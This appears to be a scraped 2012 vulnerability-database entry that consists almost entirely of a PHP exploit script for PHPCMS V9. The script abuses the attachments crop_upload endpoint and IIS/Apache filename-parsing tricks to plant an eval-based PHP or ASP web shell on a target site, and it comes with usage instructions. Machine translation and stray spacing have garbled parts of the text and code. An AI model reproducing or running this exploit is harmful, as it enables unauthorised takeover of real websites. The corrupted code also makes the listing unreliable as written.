PHPCMS V9 latest getshell vulnerabilities-vulnerability warning-the black bar safety net

2012-09-28T00:00:00
ID MYHACK58:62201235055
Type myhack58
Reporter 佚名
Modified 2012-09-28T00:00:00

Description

! usr/bin/php-w <? php

error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r('

+---------------------------------------------------------------------------+

PHPCms V9 GETSHELL 0DAY

c0de by testr00ttest admin163.net

For iis6. 0 vulnerability a bit tasteless but can also be used

apache is old version may cause problems

+---------------------------------------------------------------------------+

'); echo 'password for'.$ pass; if ($argc < 2) { print_r('

+---------------------------------------------------------------------------+

Usage: php '.$ argv[0].' url [js]

js type Configuration 1 to asp 2 for php 3 apache version

Example:

php '.$ argv[0].' localhost 1

+---------------------------------------------------------------------------+

'); exit; } $url=$argv[1]; $js=$argv[2];//Write into the script type $phpshell='<? php @eval($_POST[".$ pass."]);?>'; $aspshell='<%eval request("'.$ pass.'")%>'; if($js==1){ $file="1. asp;1.jpg"; $ret=GetShell($url,$aspshell,$file); }else if($js==2){ $file="1.php;1.jpg"; $ret=GetShell($url,$phpshell,$file); }else if($js==3){ $file="1.php.jpg"; $ret=GetShell($url,$phpshell,$file); }else{ print_r('no select the script type'); } $pattern = "|http://[^,]+?. jpg,?| U"; preg_match_all($pattern, $ret, $matches); if($matches[0][0]){ echo "rnurl address:".$ matches[0][0]; }else{ echo "rn didn't get!"; } function GetShell($url,$shell,$js){ $content =$shell; $data = "POST /index. php? m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$ url."/ uploadfile/".$ js." HTTP/1.1 rn"; $data .= "Host: ".$ url."rn"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1 rn"; $data .= "Accept: textml,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 rn"; $data .= "Accept-Language: EN-us,EN;q=0.8,en-us;q=0.5,en;q=0.3 rn"; $data .= "Connection: closern"; $data .= "Content-Length: ". strlen($content)."rnrn"; $data .= $content."rn"; //echo $data; $ock=fsockopen($url,8 0); if (!$ ock) { echo "[*] No response from ".$ url."n"; } fwrite($ock,$data); $resp = "; while (! feof($ock)) { $resp.= fread($ock, 1 0 2 4); } return $resp; } ?>